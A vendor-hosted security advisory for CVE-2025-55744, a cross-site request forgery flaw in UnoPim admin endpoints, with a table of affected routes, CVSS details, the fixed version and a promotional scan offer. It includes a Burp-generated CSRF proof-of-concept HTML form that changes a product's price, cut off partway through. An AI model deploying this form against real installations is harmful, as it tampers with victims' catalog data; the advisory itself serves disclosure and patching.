Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2025-55744 — unopim

🟡 CVSS 4.3 — Medium ⚠️ Exploit Public CWE-352 NVD
4.3
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

UnoPim vulnerable to CSRF on Product edit feature and creation of other types

Summary

Some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF).

| Method | Endpoint | Status | Reason |

|:------:|:------:|:------:|:------:|

| POST | /admin/catalog/products/create | Not Vulnerable :white_check_mark: | X-XSRF-TOKEN header used |

| GET | /admin/catalog/products/copy/{id}| Vulnerable :x: | Missing X-XSRF-TOKEN header or similar protection |

| POST | /admin/catalog/products/edit/{id}| Vulnerable :x: | Missing X-XSRF-TOKEN header or similar protection |

| POST | /admin/settings/users/create | Not Vulnerable :white_check_mark: | X-XSRF-TOKEN header used |

The below are some of the vulnerable endpoints that allow state changing actions including but not limited to:

```

/admin/catalog/categories/create

/admin/catalog/categories/edit/{id}

/admin/catalog/category-fields/create

/admin/catalog/category-fields/edit/{id}

/admin/catalog/attributes/create

/admin/catalog/attributes/edit/{id}

```

Details

CSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim.

In this case, the POST request doesn't need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either application/x-www-form-urlencoded or multipart/form-data so we can say this is a Simple request ( doesn't need preflight request ). The cookies are send because samesite is set to None. We have every ingredients for a successful CSRF attack.

PoC

1. Go to any product and click on Edit.

2. Capture the request on Burp, right click and generate a CSRF POC ( or use the below csrf-poc.html )

3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed.

POC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ

csrf-poc.html:

```

<html>

<!-- CSRF PoC - generated by Burp Suite Professional -->

<body>

<script>history.pushState('', '', '/')</script>

<form action="http://127.0.0.1:8000/admin/catalog/products/edit/7" method="POST" enctype="multipart/form-data">

<input type="hidden" name="_token" value="s9Egihm0RD1Pd1NxhvTrx0a4qKCdl0UTSzyyJaK5" />

<input type="hidden" name="_method" value="PUT" />

<input type="hidden" name="sku" value="SM-BL-102" />

<input type="hidden" name="channel" value="default" />

<input type="hidden" name="locale" value="en_US" />

<input type="hidden" name="values[common][sku]" value="SM-BL-102" />

<input type="hidden" name="uniqueFields[values.common.sku]" value="values[common][sku]" />

<input type="hidden" name="values[common][product_number]" value="" />

<input type="hidden" name="uniqueFields[values.common.product_number]" value="values[common][product_number]" />

<input type="hidden" name="values[channel_locale_specific][default][en_US][name]" value="test" />

<input type="hidden" name="values[common][url_key]" value="fffkk" />

<input type="hidden" name="uniqueFields[values.common.url_key]" value="values[common][url_key]" />

<input type="hidden" name="values[channel_specific][default][tax_category_id]" value="" />

<input type="hidden" name="values[channel_specific][default][tax_category_id]" value="" />

<input type="hidden" name="values[common][color]" value="" />

<input type="hidden" name="values[common][color]" value="" />

<input type="hidden" name="values[common][size]" value="" />

<input type="hidden" name="values[common][size]" value="" />

<input type="hidden" name="values[common][brand]" value="" />

<input type="hidden" name="values[common][brand]" value="" />

<input type="hidden" name="values[channel_locale_specific][default][en_US][short_description]" value="<p>fff</p>" />

<input type="hidden" name="values[channel_locale_specific][default][en_US][description]" value="<p>fff</p>" />

<input type="hidden" name="values[channel_locale_specific][default][en_US][meta_title]" value="" />

<input type="hidden" name="values[channel_locale_specific][default][en_US][meta_keywords]" value="" />

<input type="

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. A user must be tricked into taking some action. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity low, availability none.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: Low — the attack works reliably, with no preparation.
  • Privileges required: None — an unauthenticated stranger can try it.
  • User interaction: Required — someone has to click, open or visit something.
  • Scope: Unchanged — the damage stays inside the vulnerable component.
  • Confidentiality impact: None.
  • Integrity impact: Low — limited, and the attacker does not choose what is affected.
  • Availability impact: None.

Weakness class

CVE-2025-55744 is classified as CWE-352: Cross-Site Request Forgery (CSRF). A state-changing request is accepted without proof it was intended, so another site can trigger it using the victim's session.

Affected software

CVE-2025-55744 is recorded against 2 packages.

  • unopim (fixed in 0.2.1)
  • unopim/unopim (fixed in 0.2.1)

Timeline and source

Published on 21 August 2025 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. Record sourced from NVD.

References

drive.proton.me
github.com

Other advisories for this package

unopim has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-352: Cross-Site Request Forgery (CSRF)) in other software:

Details

Severity MEDIUM
CVSS Score 4.3
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
CWE CWE-352
Public Exploit ⚠️ Yes
Source NVD
Published 2025-08-21
Updated 2026-08-20
Modified 2026-06-17
Fix URL N/A

Affected Packages

Software From version Fixed in
unopim 0.2.1
unopim/unopim 0.2.1

Similar Threats

Exploit Protection

Are you running unopim?

CVE-2025-55744 carries CVSS 4.3 Medium rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2025-55744 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2025